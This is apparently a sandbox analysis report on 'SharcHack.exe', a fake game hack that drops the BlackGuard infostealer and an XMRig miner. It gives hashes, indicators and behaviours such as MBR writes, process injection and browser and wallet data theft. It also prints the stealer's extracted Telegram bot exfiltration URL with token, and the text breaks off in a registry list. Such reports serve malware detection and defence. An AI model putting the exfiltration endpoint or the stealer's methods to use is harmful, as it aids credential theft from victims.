Analysis
-
max time kernel
149s -
max time network
152s -
platform
windows7_x64 -
resource
win7-20240903-en -
resource tags
arch:x64arch:x86image:win7-20240903-enlocale:en-usos:windows7-x64system -
submitted
30-12-2024 17:38
Static task
static1
Behavioral task
behavioral1
Sample
SharcHack.exe
Resource
win7-20240903-en
Behavioral task
behavioral2
Sample
SharcHack.exe
Resource
win10v2004-20241007-en
General
-
Target
SharcHack.exe
-
Size
39.9MB
-
MD5
796310542e9fb2886de3f8cbdf88c9fa
-
SHA1
01dc8e64ff23db2f177e3d999c12329bfcd206d3
-
SHA256
9f3b062a0f8caf16be80ac44ade55a8b8e8928ef87ae909f5d6d52aa44208193
-
SHA512
73295b9cfa07432b21d1f0d0bad360460f32d7e0170dc84406a35f4dfe2b1519fdc4028299f1075385ae4ab738be1e5bfffd7335c1038e2126669834e9a50966
-
SSDEEP
786432:Y31/CaCJz7+GWl3LNCxuEnwFho+zM77UDZiZCd08jFZJAI5E70TZFHng:URCR6GWl3LMEXFhV0KAcNjxAItjg
Malware Config
Extracted
blackguard
https://api.telegram.org/bot6540906397:AAG08fPgT-V7I17vtz49STaZEuwqXqKshuM/sendMessage?chat_id=5445185021
Signatures
-
BlackGuard
Infostealer first seen in Late 2021.
-
Blackguard family
-
Modifies security service 2 TTPs 2 IoCs
description ioc Process Key deleted \REGISTRY\MACHINE\SYSTEM\ControlSet001\services\wuauserv\Parameters reg.exe Key deleted \REGISTRY\MACHINE\SYSTEM\ControlSet001\services\wuauserv\Security reg.exe -
Suspicious use of NtCreateUserProcessOtherParentProcess 13 IoCs
description pid Process procid_target PID 1660 created 1196 1660 3.exe 21 PID 1660 created 1196 1660 3.exe 21 PID 1660 created 1196 1660 3.exe 21 PID 1660 created 1196 1660 3.exe 21 PID 1660 created 1196 1660 3.exe 21 PID 2788 created 1196 2788 updater.exe 21 PID 2788 created 1196 2788 updater.exe 21 PID 2788 created 1196 2788 updater.exe 21 PID 2788 created 1196 2788 updater.exe 21 PID 2788 created 1196 2788 updater.exe 21 PID 2120 created 1196 2120 conhost.exe 21 PID 2788 created 1196 2788 updater.exe 21 PID 2788 created 1196 2788 updater.exe 21 -
Xmrig family
-
XMRig Miner payload 13 IoCs
resource yara_rule behavioral1/memory/1580-321-0x0000000140000000-0x00000001407F4000-memory.dmp xmrig behavioral1/memory/1580-320-0x0000000140000000-0x00000001407F4000-memory.dmp xmrig behavioral1/memory/1580-372-0x0000000140000000-0x00000001407F4000-memory.dmp xmrig behavioral1/memory/1580-1181-0x0000000140000000-0x00000001407F4000-memory.dmp xmrig behavioral1/memory/1580-1199-0x0000000140000000-0x00000001407F4000-memory.dmp xmrig behavioral1/memory/1580-1214-0x0000000140000000-0x00000001407F4000-memory.dmp xmrig behavioral1/memory/1580-1299-0x0000000140000000-0x00000001407F4000-memory.dmp xmrig behavioral1/memory/1580-1323-0x0000000140000000-0x00000001407F4000-memory.dmp xmrig behavioral1/memory/1580-1363-0x0000000140000000-0x00000001407F4000-memory.dmp xmrig behavioral1/memory/1580-1532-0x0000000140000000-0x00000001407F4000-memory.dmp xmrig behavioral1/memory/1580-1721-0x0000000140000000-0x00000001407F4000-memory.dmp xmrig behavioral1/memory/1580-1784-0x0000000140000000-0x00000001407F4000-memory.dmp xmrig behavioral1/memory/1580-1793-0x0000000140000000-0x00000001407F4000-memory.dmp xmrig -
pid Process 2276 powershell.exe 2100 powershell.exe 1520 powershell.exe 2928 powershell.exe -
Downloads MZ/PE file
-
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000\Control Panel\International\Geo\Nation avg_secure_browser_setup.exe -
Executes dropped EXE 24 IoCs
pid Process 1660 3.exe 1872 VegaStealer_v2.exe 2656 v2.exe 768 CheatEngine75.exe 2804 CheatEngine75.tmp 2788 updater.exe 900 WZSetup.exe 1056 avg_secure_browser_setup.exe 2276 cookie_mmm_irs_ppi_005_888_a.exe 1368 CheatEngine75.exe 2912 CheatEngine75.tmp 2420 _setup64.tmp 956 avast_free_antivirus_setup_online_x64.exe 788 Kernelmoduleunloader.exe 1152 windowsrepair.exe 3016 instup.exe 1844 Cheat Engine.exe 780 cheatengine-x86_64-SSE4-AVX2.exe 1744 WeatherZeroService.exe 2560 WeatherZeroService.exe 2656 WeatherZeroService.exe 2660 instup.exe 1920 sbr.exe 2792 WeatherZero.exe -
Loads dropped DLL 64 IoCs
pid Process 1768 SharcHack.exe 1768 SharcHack.exe 1768 SharcHack.exe 1768 SharcHack.exe 1872 VegaStealer_v2.exe 768 CheatEngine75.exe 2656 v2.exe 2656 v2.exe 2656 v2.exe 2656 v2.exe 2656 v2.exe 2656 v2.exe 2656 v2.exe 2804 CheatEngine75.tmp 2036 taskeng.exe 2804 CheatEngine75.tmp 900 WZSetup.exe 900 WZSetup.exe 2804 CheatEngine75.tmp 1056 avg_secure_browser_setup.exe 1056 avg_secure_browser_setup.exe 1056 avg_secure_browser_setup.exe 2804 CheatEngine75.tmp 1056 avg_secure_browser_setup.exe 1056 avg_secure_browser_setup.exe 1056 avg_secure_browser_setup.exe 1056 avg_secure_browser_setup.exe 2804 CheatEngine75.tmp 1368 CheatEngine75.exe 2912 CheatEngine75.tmp 2276 cookie_mmm_irs_ppi_005_888_a.exe 2276 cookie_mmm_irs_ppi_005_888_a.exe 956 avast_free_antivirus_setup_online_x64.exe 956 avast_free_antivirus_setup_online_x64.exe 956 avast_free_antivirus_setup_online_x64.exe 956 avast_free_antivirus_setup_online_x64.exe 956 avast_free_antivirus_setup_online_x64.exe 956 avast_free_antivirus_setup_online_x64.exe 2912 CheatEngine75.tmp 2912 CheatEngine75.tmp 2912 CheatEngine75.tmp 2912 CheatEngine75.tmp 2912 CheatEngine75.tmp 2912 CheatEngine75.tmp 2912 CheatEngine75.tmp 2912 CheatEngine75.tmp 2912 CheatEngine75.tmp 2912 CheatEngine75.tmp 956 avast_free_antivirus_setup_online_x64.exe 3016 instup.exe 1844 Cheat Engine.exe 780 cheatengine-x86_64-SSE4-AVX2.exe 780 cheatengine-x86_64-SSE4-AVX2.exe 780 cheatengine-x86_64-SSE4-AVX2.exe 780 cheatengine-x86_64-SSE4-AVX2.exe 2168 WerFault.exe 2168 WerFault.exe 2168 WerFault.exe 2168 WerFault.exe 2168 WerFault.exe 900 WZSetup.exe 900 WZSetup.exe 900 WZSetup.exe 900 WZSetup.exe -
Modifies file permissions 1 TTPs 2 IoCs
pid Process 1240 icacls.exe 1504 icacls.exe -
Reads user/profile data of web browsers 3 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
-
Adds Run key to start application 2 TTPs 1 IoCs
description ioc Process Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\AvRepair = "\"C:\\Program Files\\Avast Software\\Avast\\setup\\instup.exe\" /instop:repair /wait" instup.exe -
Checks for any installed AV software in registry 1 TTPs 63 IoCs
description ioc Process Key value queried \REGISTRY\MACHINE\SOFTWARE\Avast Software\Avast\LogFolder instup.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Avast Software\Avast\LicenseFile instup.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Avast Software\Avast\CertificateFile instup.exe Key opened \REGISTRY\MACHINE\SOFTWARE\AVG\AV\Dir CheatEngine75.tmp Key opened \REGISTRY\MACHINE\SOFTWARE\Avast Software\Avast instup.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Avast Software\Avast\JournalFolder instup.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Avast Software\Avast\ChestFolder instup.exe Key opened \Registry\MACHINE\SOFTWARE\Avast Software\Avast avast_free_antivirus_setup_online_x64.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Avast Software\Avast\CrashGuardProcessWatcherExclusions instup.exe Key opened \REGISTRY\MACHINE\SOFTWARE\Avast Software\Avast\properties instup.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Avast Software\Avast\LogFolder instup.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Avast Software\Avast\ShepherdDebug instup.exe Key opened \REGISTRY\MACHINE\SOFTWARE\Avast Software\Avast\properties\burger_client instup.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Avast Software\Avast\ProgramFolder instup.exe Key opened \REGISTRY\MACHINE\SOFTWARE\Avast Software\Avast\properties\settings instup.exe Key opened \REGISTRY\MACHINE\SOFTWARE\AVAST Software\Avast CheatEngine75.tmp Key opened \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Avira\Browser\Installed CheatEngine75.tmp Set value (int) \REGISTRY\MACHINE\SOFTWARE\Avast Software\Avast\properties\UseRegistry = "1" instup.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Avast Software\Avast\DataFolder instup.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Avast Software\Avast\FwDataFolder instup.exe Key opened \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\AVG\AV\Dir CheatEngine75.tmp Key opened \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\AVAST Software\Avast avg_secure_browser_setup.exe Key opened \REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000\SOFTWARE\AVAST Software\Avast avg_secure_browser_setup.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Avast Software\Avast\CrashGuardProcessWatcherExclusions instup.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Avast Software\Avast\MovedFolder instup.exe Key opened \Registry\MACHINE\SOFTWARE\Avast Software\Avast instup.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Avast Software\Avast\JournalFolder instup.exe Key created \REGISTRY\MACHINE\SOFTWARE\Avast Software\Avast instup.exe Key opened \REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000\SOFTWARE\AVG\AV\Dir CheatEngine75.tmp Key value queried \REGISTRY\MACHINE\SOFTWARE\Avast Software\Avast\DataFolder instup.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Avast Software\Avast\SetupLog = "C:\\ProgramData\\Avast Software\\Persistent Data\\Avast\\Logs\\Setup.log" instup.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Avast Software\Avast\Instup_IgnoredDownloadTypes instup.exe Key opened \REGISTRY\MACHINE\Software\AVAST Software\Avast instup.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Avast Software\Avast\FwDataFolder instup.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Avast Software\Avast\properties\UseRegistry instup.exe Key created \REGISTRY\MACHINE\SOFTWARE\Avast Software\Avast\properties instup.exe Key opened \REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000\SOFTWARE\AVAST Software\Avast CheatEngine75.tmp Key opened \REGISTRY\MACHINE\SOFTWARE\Avira\Browser\Installed CheatEngine75.tmp Key opened \REGISTRY\MACHINE\SOFTWARE\Avast Software\Avast avast_free_antivirus_setup_online_x64.exe Key opened \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\AVAST Software\Avast CheatEngine75.tmp Set value (str) \REGISTRY\MACHINE\SOFTWARE\Avast Software\Avast\SetupLog = "C:\\ProgramData\\Avast Software\\Persistent Data\\Avast\\Logs\\Setup.log" instup.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Avast Software\Avast\ShepherdDebug instup.exe Key opened \REGISTRY\MACHINE\Software\Avira\Antivirus instup.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Avast Software\Avast\TempFolder instup.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Avast Software\Avast\ReportFolder instup.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Avast Software\Avast\Instup_IgnoredDownloadTypes instup.exe Key opened \REGISTRY\MACHINE\SOFTWARE\Avast Software\Avast instup.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Avast Software\Avast\ReportFolder instup.exe Key opened \REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000\SOFTWARE\Avira\Browser\Installed CheatEngine75.tmp Key opened \REGISTRY\MACHINE\SOFTWARE\Avast Software\Avast\properties instup.exe Key created \REGISTRY\MACHINE\SOFTWARE\Avast Software\Avast instup.exe Key queried \REGISTRY\MACHINE\SOFTWARE\Avast Software\Avast instup.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Avast Software\Avast\MovedFolder instup.exe Key opened \REGISTRY\MACHINE\SOFTWARE\Avast Software\Avast\properties\burger_client instup.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Avast Software\Avast\CertificateFile instup.exe Key opened \REGISTRY\MACHINE\Software\AVAST Software\Avast instup.exe Key opened \REGISTRY\MACHINE\Software\AVAST Software\Avast avast_free_antivirus_setup_online_x64.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Avast Software\Avast\properties\UseRegistry instup.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Avast Software\Avast\LicenseFile instup.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Avast Software\Avast\ChestFolder instup.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Avast Software\Avast\ProgramFolder instup.exe Key opened \REGISTRY\MACHINE\SOFTWARE\Avast Software\Avast\properties\settings instup.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Avast Software\Avast\TempFolder instup.exe -
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
Looks up external IP address via web service 4 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
flow ioc 113 ip-api.com 4 freegeoip.app 5 freegeoip.app 8 ip-api.com -
Power Settings 1 TTPs 10 IoCs
powercfg controls all configurable power system settings on a Windows system and can be abused to prevent an infected host from locking or shutting down.
pid Process 1028 powercfg.exe 1416 powercfg.exe 2744 powercfg.exe 2428 powercfg.exe 2648 powercfg.exe 2692 powercfg.exe 2096 cmd.exe 2712 cmd.exe 2932 powercfg.exe 2152 powercfg.exe -
Writes to the Master Boot Record (MBR) 1 TTPs 5 IoCs
Bootkits write to the MBR to gain persistence at a level below the operating system.
description ioc Process File opened for modification \??\PhysicalDrive0 cookie_mmm_irs_ppi_005_888_a.exe File opened for modification \??\PhysicalDrive0 avg_secure_browser_setup.exe File opened for modification \??\PhysicalDrive0 avast_free_antivirus_setup_online_x64.exe File opened for modification \??\PhysicalDrive0 instup.exe File opened for modification \??\PhysicalDrive0 instup.exe -
Drops file in System32 directory 5 IoCs
description ioc Process File opened for modification C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk powershell.exe File opened for modification C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk powershell.exe File opened for modification C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk powershell.exe File opened for modification C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk powershell.exe File opened for modification C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk powershell.exe -
Suspicious use of SetThreadContext 2 IoCs
description pid Process procid_target PID 2788 set thread context of 2120 2788 updater.exe 88 PID 2788 set thread context of 1580 2788 updater.exe 94 -
resource yara_rule behavioral1/memory/1580-316-0x0000000140000000-0x00000001407F4000-memory.dmp upx behavioral1/memory/1580-321-0x0000000140000000-0x00000001407F4000-memory.dmp upx behavioral1/memory/1580-320-0x0000000140000000-0x00000001407F4000-memory.dmp upx behavioral1/memory/1580-372-0x0000000140000000-0x00000001407F4000-memory.dmp upx behavioral1/memory/1580-1181-0x0000000140000000-0x00000001407F4000-memory.dmp upx behavioral1/memory/1580-1199-0x0000000140000000-0x00000001407F4000-memory.dmp upx behavioral1/memory/1580-1214-0x0000000140000000-0x00000001407F4000-memory.dmp upx behavioral1/memory/1580-1299-0x0000000140000000-0x00000001407F4000-memory.dmp upx behavioral1/memory/1580-1323-0x0000000140000000-0x00000001407F4000-memory.dmp upx behavioral1/memory/1580-1363-0x0000000140000000-0x00000001407F4000-memory.dmp upx behavioral1/memory/1580-1532-0x0000000140000000-0x00000001407F4000-memory.dmp upx behavioral1/memory/1580-1721-0x0000000140000000-0x00000001407F4000-memory.dmp upx behavioral1/memory/1580-1784-0x0000000140000000-0x00000001407F4000-memory.dmp upx behavioral1/memory/1580-1793-0x0000000140000000-0x00000001407F4000-memory.dmp upx -
Drops file in Program Files directory 64 IoCs
description ioc Process File created C:\Program Files\Cheat Engine 7.5\autorun\dlls\src\Java\CEJVMTI\CEJVMTI\is-2NBSR.tmp CheatEngine75.tmp File created C:\Program Files\Cheat Engine 7.5\autorun\dlls\src\Mono\MonoDataCollector\is-JA8EP.tmp CheatEngine75.tmp File created C:\Program Files\Cheat Engine 7.5\is-SOUN6.tmp CheatEngine75.tmp File created C:\Program Files\Cheat Engine 7.5\autorun\is-7ADOH.tmp CheatEngine75.tmp File created C:\Program Files\Cheat Engine 7.5\autorun\is-D6VRA.tmp CheatEngine75.tmp File created C:\Program Files\Cheat Engine 7.5\include\sys\is-9AFAC.tmp CheatEngine75.tmp File created C:\Program Files\Cheat Engine 7.5\include\tcc\is-59I9K.tmp CheatEngine75.tmp File created C:\Program Files\Cheat Engine 7.5\languages\is-DQPFB.tmp CheatEngine75.tmp File created C:\Program Files\Cheat Engine 7.5\autorun\is-0QEL1.tmp CheatEngine75.tmp File created C:\Program Files\Google\Libs\g.log cmd.exe File created C:\Program Files\Cheat Engine 7.5\is-5URB7.tmp CheatEngine75.tmp File created C:\Program Files\Cheat Engine 7.5\include\sys\is-H4P40.tmp CheatEngine75.tmp File created C:\Program Files\Cheat Engine 7.5\is-9FLQ6.tmp CheatEngine75.tmp File created C:\Program Files\Cheat Engine 7.5\include\is-A6SLO.tmp CheatEngine75.tmp File created C:\Program Files\Cheat Engine 7.5\include\is-OTNGT.tmp CheatEngine75.tmp File created C:\Program Files\Cheat Engine 7.5\languages\is-BRVUM.tmp CheatEngine75.tmp File created C:\Program Files\Cheat Engine 7.5\autorun\is-7I08F.tmp CheatEngine75.tmp File created C:\Program Files\Google\Chrome\updater.exe 3.exe File opened for modification C:\Program Files\Cheat Engine 7.5\vehdebug-i386.dll CheatEngine75.tmp File created C:\Program Files\Cheat Engine 7.5\is-MGEGK.tmp CheatEngine75.tmp File created C:\Program Files\Cheat Engine 7.5\autorun\dlls\src\Common\is-ISN43.tmp CheatEngine75.tmp File created C:\Program Files (x86)\WeatherZero\WeatherZero.exe WZSetup.exe File created C:\Program Files\Cheat Engine 7.5\autorun\dlls\src\Mono\MonoDataCollector\is-BTO2J.tmp CheatEngine75.tmp File created C:\Program Files\Cheat Engine 7.5\plugins\is-V77DR.tmp CheatEngine75.tmp File created C:\Program Files\Cheat Engine 7.5\plugins\example-c\is-MBI16.tmp CheatEngine75.tmp File opened for modification C:\Program Files\Cheat Engine 7.5\libmikmod64.dll CheatEngine75.tmp File created C:\Program Files\Cheat Engine 7.5\is-16L9A.tmp CheatEngine75.tmp File created C:\Program Files\Cheat Engine 7.5\is-V0TRM.tmp CheatEngine75.tmp File created C:\Program Files\Cheat Engine 7.5\include\is-8GDGC.tmp CheatEngine75.tmp File created C:\Program Files\Cheat Engine 7.5\include\is-O2HSD.tmp CheatEngine75.tmp File created C:\Program Files\Cheat Engine 7.5\include\is-0T3KF.tmp CheatEngine75.tmp File created C:\Program Files\Cheat Engine 7.5\plugins\c# template\CEPluginLibrary\bin\Release\is-DT5S9.tmp CheatEngine75.tmp File opened for modification C:\Program Files\Cheat Engine 7.5\plugins\c# template\CEPluginLibrary\bin\Release\CEPluginExample.dll CheatEngine75.tmp File opened for modification C:\Program Files\Cheat Engine 7.5\vehdebug-x86_64.dll CheatEngine75.tmp File created C:\Program Files\Cheat Engine 7.5\include\is-RFDR8.tmp CheatEngine75.tmp File created C:\Program Files\Cheat Engine 7.5\is-65APM.tmp CheatEngine75.tmp File created C:\Program Files\Cheat Engine 7.5\languages\is-54D8N.tmp CheatEngine75.tmp File created C:\Program Files\Cheat Engine 7.5\badassets\is-6LCUA.tmp CheatEngine75.tmp File created C:\Program Files\Cheat Engine 7.5\include\winapi\is-5KHTG.tmp CheatEngine75.tmp File created C:\Program Files\Cheat Engine 7.5\plugins\c# template\CEPluginLibrary\SDK\is-A3DK1.tmp CheatEngine75.tmp File opened for modification C:\Program Files\Cheat Engine 7.5\d3dhook.dll CheatEngine75.tmp File created C:\Program Files\Cheat Engine 7.5\include\is-VFJ0G.tmp CheatEngine75.tmp File created C:\Program Files\Cheat Engine 7.5\include\sys\is-JBF5C.tmp CheatEngine75.tmp File created C:\Program Files\Cheat Engine 7.5\plugins\is-7GMJ3.tmp CheatEngine75.tmp File opened for modification C:\Program Files\Avast Software\Avast\setup\ais_cmp_bpc-7e7.vpx instup.exe File opened for modification C:\Program Files\Avast Software\Avast\setup\ais_cmp_rescuedisk_x64-82e.vpx instup.exe File created C:\Program Files\Cheat Engine 7.5\is-DDPFF.tmp CheatEngine75.tmp File created C:\Program Files\Cheat Engine 7.5\is-CRC94.tmp CheatEngine75.tmp File created C:\Program Files\Cheat Engine 7.5\autorun\dlls\src\Java\CEJVMTI\CEJVMTI\is-PCFL3.tmp CheatEngine75.tmp File created C:\Program Files\Cheat Engine 7.5\autorun\ceshare\is-N45Q3.tmp CheatEngine75.tmp File created C:\Program Files\Cheat Engine 7.5\autorun\dlls\src\Java\CEJVMTI\CEJVMTI\is-7R5KM.tmp CheatEngine75.tmp File created C:\Program Files (x86)\WeatherZero\wz.ico WZSetup.exe File created C:\Program Files\Google\Libs\WR64.sys updater.exe File opened for modification C:\Program Files\Cheat Engine 7.5\tcc64-32.dll CheatEngine75.tmp File created C:\Program Files\Cheat Engine 7.5\is-KMQ06.tmp CheatEngine75.tmp File created C:\Program Files\Cheat Engine 7.5\tcclib\is-E9DCP.tmp CheatEngine75.tmp File created C:\Program Files\Cheat Engine 7.5\include\sec_api\is-F0R61.tmp CheatEngine75.tmp File created C:\Program Files\Cheat Engine 7.5\is-1TQB8.tmp CheatEngine75.tmp File created C:\Program Files\Cheat Engine 7.5\autorun\is-BO13F.tmp CheatEngine75.tmp File created C:\Program Files\Cheat Engine 7.5\autorun\ceshare\forms\is-MLFQS.tmp CheatEngine75.tmp File opened for modification C:\Program Files\Cheat Engine 7.5\Cheat Engine.exe CheatEngine75.tmp File opened for modification C:\Program Files\Cheat Engine 7.5\CSCompiler.dll CheatEngine75.tmp File created C:\Program Files\Cheat Engine 7.5\is-694D9.tmp CheatEngine75.tmp File created C:\Program Files\Cheat Engine 7.5\is-GN796.tmp CheatEngine75.tmp -
Launches sc.exe 12 IoCs
Sc.exe is a Windows utlilty to control services on the system.
pid Process 2704 sc.exe 2536 sc.exe 2284 sc.exe 2284 sc.exe 2660 sc.exe 1872 sc.exe 2848 sc.exe 2852 sc.exe 2740 sc.exe 2668 sc.exe 2664 sc.exe 2876 sc.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Program crash 1 IoCs
pid pid_target Process procid_target 2168 2804 WerFault.exe 34 -
System Location Discovery: System Language Discovery 1 TTPs 18 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cvtres.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language CheatEngine75.tmp Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language WeatherZeroService.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language csc.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language CheatEngine75.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language WZSetup.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cookie_mmm_irs_ppi_005_888_a.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language CheatEngine75.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Kernelmoduleunloader.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language SharcHack.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language VegaStealer_v2.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language v2.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Cheat Engine.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language WeatherZero.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language avg_secure_browser_setup.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language CheatEngine75.tmp Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language WeatherZeroService.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language WeatherZeroService.exe -
NSIS installer 2 IoCs
resource yara_rule behavioral1/files/0x000500000001a4de-364.dat nsis_installer_1 behavioral1/files/0x000500000001a4de-364.dat nsis_installer_2 -
Checks processor information in registry 2 TTPs 22 IoCs
Processor information is often read in order to detect sandboxing environments.
description ioc Process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ CheatEngine75.tmp Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 avast_free_antivirus_setup_online_x64.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 instup.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\CurrentPatchLevel instup.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString instup.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Signature avast_free_antivirus_setup_online_x64.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision avast_free_antivirus_setup_online_x64.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\CurrentPatchLevel avast_free_antivirus_setup_online_x64.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Signature instup.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 instup.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 instup.exe Key opened \REGISTRY\MACHINE\HARDWARE\Description\System\CentralProcessor\0 v2.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision instup.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\CurrentPatchLevel instup.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz instup.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision instup.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier v2.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 CheatEngine75.tmp Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 instup.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString instup.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz instup.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Signature instup.exe -
Detects videocard installed 1 TTPs 1 IoCs
Uses WMIC.exe to determine videocard installed.
pid Process 1564 WMIC.exe -
Modifies data under HKEY_USERS 3 IoCs
description ioc Process Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\StartPage powershell.exe Set value (data) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\StartPage\StartMenu_Start_Time = 301acac7e15adb01 powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ WMIC.exe -
Modifies registry class 64 IoCs
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Classes\AvastPersistentStorage\InstupProgress_Installation_Syncer = "94" instup.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Classes\AvastPersistentStorage\InstupProgress_Installation_Syncer = "76" instup.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\AvastPersistentStorage\InstupProgress_Description = "File downloaded: ais_cmp_gamingmode-87a.vpx" instup.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\AvastPersistentStorage\InstupProgress_Description = "Updating package: ais_dll_eng" instup.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Classes\AvastPersistentStorage\InstupProgress_UpdateSetup_Syncer = "16" instup.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Classes\AvastPersistentStorage\InstupProgress_UpdateSetup_Syncer = "86" instup.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Classes\AvastPersistentStorage\InstupProgress_Installation_Syncer = "17" 